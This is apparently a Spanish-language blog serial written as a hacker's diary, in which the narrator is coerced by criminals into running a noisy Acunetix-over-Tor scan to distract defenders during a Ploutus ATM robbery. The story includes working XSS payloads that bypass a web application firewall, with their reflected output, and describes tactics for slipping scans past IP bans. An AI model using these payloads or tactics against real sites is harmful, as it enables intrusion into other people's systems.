Volví a revisar las configuraciones de Acunetix, todo parecía ruidoso, me conecté a mi VPN usando Tunnelblick; es un cliente de VPN que me gusta mucho, funciona en OS X y es compatible con archivos de OpenVPN. Lance un escaneo de prueba con las opciones por defecto, incluyendo la modificación al user-agent que incluye la palabra “Acunetix” para su detección.

Así, por ejemplo si tenemos un user-agent de IE, tipo:

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)

Al ejecutar el escaneo tendríamos algo así:

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0) - Acunetix Web Scanner

Eso puede ser utilizado para generar alguna excepción en un IPS y dejar pasar las conexiones para verificar la seguridad de un sitio, o para detectar cuando son escaneos automatizados y generar una política para ellos. En mi caso sólo quería verificar el comportamiento, y me encontré algo muy malo en el response.

Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Amz-Date: 20130813T150211Z
Host: ec2.amazonaws.com
Authorization: AWS4-HMAC-SHA256 Credential=AKIDEXAMPLE/20130813/us-east-1/ec2/aws4_request, SignedHeaders=content-type;host;x-amz-date, Signature=ced6826de92d2bdeed8f846f0bf508e8559e98e4b0194b84example54174deb456c

http://ec2.amazonaws.com/?Action=RunInstances
ImageId=ami-2bb65342
&MaxCount=3
&MinCount=1
&Monitoring.Enabled=true
&Placement.AvailabilityZone=us-east-1a
&Version=2016-11-15

Había estado tan ocupado pensando en como no morir de una forma tan fea, que no había verificado en donde estaba la infraestructura de los portales. Y lo mismo pasaba para ambos.

Cruce los dedos mientras tecleaba cada letra usando Burp Suite, a pesar del calor que hace; incluso en invierno, mis manos se habían puesto heladas mientras lo hacia:

“=””’><details open=“”>

La salida:

<span>”=””’&gt;&lt;details open=””&gt; (0)</span>

No era necesario probar más… sabía lo que tenía en frente. Mi escaneo iba a ser bloqueado en segundos sin causar la distracción, eso atraería las miradas hacia el monitoreo de las bases de datos, modificación de tablas de los core bancarios y sabrían que estaban vaciando los cajeros. Esto estaba mal.

Si lograba sacar, aunque fuese un pop-up tendría idea de como estaban configuradas las políticas, así que no me quedó más que probar, y probar… y probar:

“=””’></><script></script><svg onload”=”alert(1)>

<svg onload”=”… (1)> </span><a href=” “=”” class=”” rel=”1"></svg>

Encendí el aire acondicionado, no sabía si tenía calor o tenía frío. Sólo sentía dolor de cabeza y muchas ganas de vomitar.

“=””’></><script></script><svg onload”=””alertonload=alert(1)””>

<span>”=””’&gt;<svg onload”=”… (1)” “=””> </svg></span>

¡Oh diablos!

“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt(1)>

onload=”prompt</span”><a href=”” class=”” rel=”0"></a></svg></span>

En este momento fui a mi buró, saqué mi pasaporte, visa; verifiqué los precios del Bitcoin, ETH y Ripple; junté todo mi dinero en efectivo. Y le escribí un mensaje a Mylena para decirle que tal vez debía de salir corriendo de donde estuviese, porque el plan había fallado antes de comenzar.

Intenté advertirle que básicamente iba a recibir unos tehuacanazos, pocito y no volvería a comer un taco al pastor; pero creo que ella no pudo darse cuenta que ya no me encontraba en el DF y menos que había fallado en la misión. Así que terminé con un “ahhh, todo bajo control, mañana nos vemos para celebrar”.

Por alguna razón la gente confía mucho en mi, nunca he entendido eso. El punto era… ambos íbamos a morir, y ella iba a ser la primera.

Salí a caminar para despejarme y para comer algo; caminé sobre toda Avenida Cuahutemoc y después por Benito Juárez; hasta el Baires. El Baires es mi restaurante favorito en todo Mexicali; venden cortes a precio de regalo con bastante buenos, lo atiende un señor argentino; y Miguel, el hostess, ya me conoce. De hecho ya nunca me dan la carta o me preguntan que comeré, siempre que llegó a los pocos minutos me sirven una copa de vino y me dice:

- Ca... en unos minutos te traemos tu comida.

Siempre un Rib Eye término inglés con mucha pimienta y una papa al horno, también con mucha pimienta. Igual apenas termino de comer y me traen un carajillo como digestivo. Mexicali en tan chico que prácticamente en todos los sitios donde usualmente como me reconocen y me atienden de la misma forma, tengo muchas alcaldías en Foursquare así.

El fin estaba cerca, y en vez de preocuparme, estaba allí tranquilamente comiendo… la verdad es que… Mylena no me importa mucho, apenas la conozco; y esta muy fea, creo que me han timado con las rusas como me timaron con las colombianas. Por otra parte, yo llevaba bastante tiempo buscando morir, así que creo que todo estaba resuelto. Aun así no podía quitarme de la cabeza ese WAF, diablos…. era casi un reto; y de pronto algo apareció en mi mente.

Terminé de comer…. bueno, no; comí lentamente disfrutando cada bocado.

Y entonces si… salí corriendo, llegué a casa, crucé hasta la computadora y escribí:

“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt`1`>

<svg onload”…=”” (1)””=”” onload=”prompt`1`”> </svg>

“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt`document.domain`>

<svg onload”…=”” (1)””=”” onload=”prompt`document.domain`”> </svg>

“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=setInterval`alert\x28document.domain\x29`

Oh Santo Chucho Cristo Redentor…

Querido Diario…¿alguna vez has sentido esa sensación de triunfo?, ¿esa sensación de saberte imbatible?, ¿capaz de ganarle a cualquiera?, ¿de hacer cualquier cosa?… ¿esa sensación embriagante que motivaba al verdadero hacking de saberte mejor que los demás?… es increíble sentir eso… saber que le ganaste a un programador que pasó años en la universidad, certificaciones, pasó horas desarrollando… y tú, tú eres mejor que él. Esa sensación de saber que hiciste lo que nadie más pudo hacer… esa sensación de simplemente saber que eres mejor, EL mejor.

Hice los cambios en Acunetix con ese string y entonces esperé… y justo a las 11pm hora del DF, empezó todo… y di click en [Start].

Desde el año pasado no he vuelto a celebrar un año nuevo; así que en esta ocasión simplemente seguí leyendo mi libro. Unas horas más tarde recibí una llamada de Mylena, me preguntó si quería pasar el año nuevo con ella.

- Estaré con mi familia - mentí

Y una hora más tarde, me envió una fotografía:

Querido diario… hum… ¡bah!

Caminé hasta el parque, me senté en una banca… y deseé haber podido caminar unas cuantas calles más.

No hay comentarios

Jueves, 28 de Diciembre de 2017: Todo lo contrario a lo que se debe de hacer

  por , ,

Querido Diario…

Mientras Fab me conseguía información sobre los RR’s que me pudiese ser útil para poder salir bien librado de este problemita; necesitaba hacer como si nada pasase y estuviese preparando mi ataque de distracción.

La misión era atacar a un portal de retail de color azul con una florecita amarilla coff… coff… y uno del pelícanito; lo que debía de hacer era atraer las miradas hacia mi, porque sabían ellos cuales eran las empresas que se encargaban de proteger a dichas empresas, y eran justo las mismas que protegían a los bancos que serían víctimas del robo del ataque de Ploutus hacia los ATM’s.

Generar ruido es un tantito más complejo de lo que la gente creería, sobre todo porque ahora a todo mundo se le da por poner WAF’s y balanceadores de carga frente a los portales; y todo esta en… [inserte aquí voz mística] “la claaaaaaud”… lo que da por resultado que apenas no lancé un port scan y terminé con la IP banneada.. y si tenemos la desventaja, como yo en Mexicali, de tener Izzi, olvídalo.

Recientemente mi amigo Luis Mala Suerte me pasó un link sobre unas VPN’s de por vida que tienen salida por varias países (https://deals.cultofmac.com/sales/vpn-unlimited-family-plan-lifetime-subscription) pero aquí necesitaba generar mucho ruido sin ser bloqueado; y el suficiente tiempo para que no me detuviesen y pusiesen mucha atención en mi, incluso más que por un simple escaneo. Por suerte creo que los Next Generation Firewalls aun no soy muy utilizados por su alto costo; así que se me ocurrió lanzar un escaneo con Acunetix configurado de una forma muuuuuy puerca.

Querido Diario…. no intentes esto sobre un cliente real…

Lo primero que hice fue seleccionar con la GDBH, básicamente esto es un montón de banners de muchas aplicaciones y servidores que se sabe son vulnerables en determinadas versiones y que por el simple hecho de responder el banner de X forma, se sobreentiende que el target es vulnerable.

En un escaneo real nunca lanzó la GDBH, porque se me hace igual de inútil que lanzar Nikto, de hecho muchos sysadmins malas personas como k001 hacen que sus web servers responsan con esos banners sólo para hacer rabiar a las personas. Pero en este caso eso sin duda generaría mucho ruido, de pronto un montón de peticiones hacía cosas como /wp-admin /admin /xoops /joomla/admin, etc… eso sin duda levantaría sospechas sobre un comportamiento extraño.

Lo siguiente fue configurar el crawling con un nivel muy alto. En casos ideales yo prefiero hacer un spydering con Burp Suite agregando el dominio en el que estoy interesado como target y dejando que el proxy solito vaya descubriendo las rutas con mi navegación y a través de los enlaces que va cargando del HTML de los responses, pero en este caso que quería generar mucho ruido Acunetix lo hace utilizando listas predeterminadas a modo de diccionario. Y obvio, muchos threads con mucho time out 😛

Sinceramente no se que es el Deep Scan, pero suena a Deep y lo Deep es ruidoso 😉

Y para agregarle más ruído no sólo al WAF, sino también al FW un escaneo ruido de 0 a 65535, no secuencial, para que sea más raro y con un time out alto.

Y finalmente todo lanzado por Tor para que las direcciones IP’s provengan de varios sitios, además de que muchos de ellos están en blacklist.. y listo… start 😉

Querido Diario… eso atrae las miradas de hasta los analistas más sonsos del mundo; perfecto para lanzarlo hoy por la noche mientras ellos empiezan a sacar el dinero de los ATM’s.

No hay comentarios

Martes, 26 de Diciembre de 2017: Lagrimas de coco… rusa

  por , ,

Querido diario…

Después de la “cena” extraña en la que terminé en Santa Fe, no le había tomado la llamada a Mylena. Tenía montones de mensajes, llamadas perdidas, y simplemente la evadía; si no la bloqueé es porque quería que se supiese ignorada. Hasta que la curiosidad me ganó y quise saber cual era su historia; no es como muy normal terminar involucrado con gente como esa de la nada; algo le debió de pasar que les conoció.

Quedé de verle en la Cafebrería del Péndulo de la Condesa. Al llegar hice todo lo posible para mostrarle lo más indiferente que puede; intentando demostrarle lo poco que me afectaba que ahora por su culpa una organización criminal me tuviese en su nómina.

Pedí café y pan francés, e hice algunos comentarios sobre los difusores de té que había en los anaqueles. Ella me miraba fijamente con esos ojos claros, que aun no determino si son verdes o miel; hasta que no pudo más y estalló:

- Dime algo
- Algo
- Sabes a que me refiero
- ¿Quieres que te reclamé sobre que puedo terminar flotando en un río negro de aguas negras por culpa tuya?, nah... no conoces nada sobre mi, créeme no tienes idea de las cosas que he llegado a hacer; y tampoco quieres saber. Mejor dime, ¿que tal están las enfrijoladas?.

Se me quedó mirando fijamente a los ojos, estupefacta; se notaba su confusión, enojo, tristeza… un montón de emociones claramente se le mezclaban en su mente y explotó. Empezó a llorar… ¿conmoverme?, nah… soy un macho, mujeriego y vividor; he visto a muchas mujeres llorar, y usualmente todas mienten.

Al ver que no me conmoví por sus lagrimas siguió comiendo, entre sollozos. Al terminar se me quedó mirando con cara de “paga la cuenta”. Lo hice, sinceramente sus lágrimas empezaban a hacer efecto en mi, pero quise resistir más; al final #viejastodassoniguales, no confiaría en ella.

Salimos y caminamos sobre la avenida rumbo a su hotel; al llegar me dijo que subiesemos a lo que respondí con un tirón y dije que no

- No suelo mezclar el sexo con los negocios, y parece que ya somos compañeros de trabajo
- No seas idiota - espeto - ven, te mostraré algo

Subí cautelosamente, durante el trayecto del elevador esperé a que al abrir hubiese un comando armado esperando. Si ya me había entregado a unos mafiosos del crimen organizado, nada le impedía ahora entregarme a la policía. Pero no, al abrir el elevador no hubo nadie; seguimos hasta su habitación y me senté en la mesita de estar; para confirmarle que no volvería a caer en sus juegos.

Entonces, Mylena sacó su pasaporte y me lo mostró. Ya sin lágrimas, entonces me empezó a explicar, y en efecto, agradecí haber nacido en México.

Mylena en efecto, si era rusa; había nacido en Sevastopol; y estudió desde la preparatoria en Moscú. Debido a que Rusia es un país no muy agradable para vivir, todo mundo piensa en estudiar para poder huir de allí. Así que, a pesar de que no era buena en ello; estudió Ingeniería en Computación; con la idea de que al menos pudiese terminar viviendo en la India.

Sin embargo en sus últimos semestres, con poco dinero; empezó a hacer trabajos freelance de programación por bitcoins; en esos tiempos que el bitcoin era muy barato. Así fue como conoció a los RR’s; quienes en un foro de Reddit escribieron preguntando por alguien capaz de modificar un código para cambiar su comportamiento. Como buena rusa, lo hizo y poco tiempo después caería en cuenta que lo que había modificado era ni más ni menos que Ploutus.

Los RR’s habían abierto ese foro en Reddit para adaptar su código a los cajeros de NCR que se usaban en América Latina; y sin saberlo, Mylena había modificado el binario para agregar las funciones de extracción de dinero a través de las teclas de función de un simple teclado conectado directamente al cajero. Sin embargo Mylena falló en algo.

Ploutus en todas sus variantes se infecta de forma física; los RR’s habían pagado a Mylena por hacerlo a través de la red; pensando que si infectaban una minicomputadora simulando un Diebold normal y lo colocaban en el mismo segmento en donde estuviese el ATM, este se infectaría de inmediato, así como todos. De hecho en alguna ocasión en Plaza Universidad de Aguascalientes, vi que el cajero Bancomer que estaba fuera del Soriana tenía un modem de Infinitum, así que teóricamente si modificaban el binario para que infectase a través de red, no era cosa más que romper la contraseña de la wireless y conectarse a la red para infectar el ATM. Pero ni Mylena ni los RR’s tomaron en cuenta la segmentación de red.

En efecto, muchos de los ATM’s tienen la arquitectura que mencioné, otros se conectan directamente por cable de red a una red cableada, otros se conectan por una VPN, etc. Eso hizo que la infección que programó Mylena, no funcionase. Peor aun, cuando los RR’s vieron que no lo había conseguido la secuestraron y la llevaron consigo para que ella siguiese desarrollando una forma en que si se pudiese dar.

Y así es como Mylena terminó en México; por sus deseos de huir de su país para tener un mejor futuro. En su viaje había visto como los RR’s vivían de fiesta en fiesta, usando personas como ella para sus propósitos, contratando modelos todos los días para sus fiestas, y dando mordidas a corruptos políticos para ir ganando posición y poder. Y así es como habían llegado a México.

Ya habían hecho algunas pruebas para infectar a los ATM’s, muchas de ellas habían sido efectivas; aunque no pensaron que en México se han instalado todo tipo de dispositivos para robar dinero, como scam’s; y eso ha hecho que los bancos los protejan mucho más.

Pero aun así, el ataque era viable. Y ahora lo ejecutarían.

¿Qué jugaba yo en todo eso?, en realidad no me querían para realizar las infecciones, esas ya las habían hecho pagando a las personas que dan mantenimiento a los cajeros. Ahora buscaban otra cosa, necesitaban crear una distracción lo suficientemente grande para atraer las miradas hacía ello y darles tiempo suficiente para trabajar tranquilamente.

Al mismo tiempo, tenían planeado que cuando todo pasase; no sólo yo habría generado un ataque obvio y masivo de distracción; sino también, sería el primer sospechoso del ataque por Ploutus. El chivo expiratorio perfecto para que la policía me investigase. Para Mylena fue una suerte que en esa fiesta precisamente yo fuese quién terminase en sus sábanas, para los RR’s fue la suerte de tener quién ejecutaría el ataqué sin tener que sacrificar a Mylena; al final una rusa güera, alta y pechugona valía más que yo… además de que aun les era útil para seguir desarrollando variantes de Ploutus que pudiesen utilizar en otros países. Todo estaba en mi contra.

Cuando entendí la situación y mis pocas salidas no supe que decir. Los ojos de Mylena expresaban temor, miedo… pero al mismo tiempo notaba que no estaba arrepentida, era ella o yo; y ella había decidido que fuese yo y no se arrepentía de ello, ya había pasado por mucho; y de cierta forma la entendía. No podía culparla por ello…

Tomé un trago de agua y me recline sobre mi asiento… en ese momento mi cerebro no lograba procesar alguna salida. El tiempo se acababa y tendría que ejecutar el ataque de distracción.

- ¿Qué tan peligrosos son?
- ¿Cómo que qué tan peligrosos son?
- Si, has pasado mucho tiempo con ellos... ¿has visto que maten gente?, ¿qué torturen?, ¿cómo son sus contactos?
- No he visto nada de eso, pero es obvio que... tú viste la fiesta, los lujos, el dinero...
- Hum... ¿sabes sus nombres reales?
- No
- Hum... no son mexicanos, su acento es diferente; pero no sé de donde puedan ser....
- ¿Qué estas diciendo?, ¿no lo entiendes?, te van a inculpar - Mylena me veía demasiado tranquilo para la situación
- ¿Tienes una foto de ellos?
- Si - y me mostró su celular
- Pásamela, por bluetooh

Una vez que me pasó la fotografía abrí mi computadora y se la mandé al “Fab”… un amigo que es especialista en buscar información en sitios reconditos. Le envié la información cifrada y le pedí que buscase todo lo que pudiese de esas personas y sus negocios.

- Belindo... aun no busco nada y ya siento que esto está feo
- Eip
- ¿En qué andas metido?
- Ya tú sabé... tengo muy mala suerte
- Bueno chavo, haré mi mayor esfuerzo... le diré a Mini Krusty, El Porro y Paola que se pongan a trabajar en ello
- Va, en cuanto tengas algo me dices... puede que dependa un poco mi vida de ello
- Lo normal, ¿no?
- Seeeeh

Colgué mientras Mail en mi celular enviaba las imágenes. Cuando terminé giré y vi a Mylena, ella había pasado los últimos minutos callada y estupefacta

- Te van a matar, no lo entiendes, no puedes jugar con ellos
- Me dijiste que no has visto que hagan algo malo
- No tengo que verlo para saber que todo lo que dicen es verdad
- Bueno, si eso es cierto; de todas formas ya estoy frito... haga lo que haga ya valió, ¿no?
- ¿Qué? - supongo esperaba que entrase en pánico, que tuviese rabia y le reclamase¡, que llorase, que intentase salir corriendo o algo - no entiendo. Es como si esto fuese algo normal para ti
- He tenido una mala vida

Mylena intentó espetar mi respuesta, pero sinceramente ya me había aburrido; la callé tumbándole a la cama… si iba a morir, bueno; no todos los días te puedes encontrar una rusa con sentimiento de culpa hacia ti, y que te deba su libertad. #yayutelanau … aunque todo el tiempo no pude quitarme de la mente el problema en el que estaba metido.

¿Querido diario?, ¿por qué tengo tan mala suerte?, no soy tan mala persona… confió en que Sergio encuentre algo que me sea útil, porque sino… creo que regresaré a la cárcel próximamente.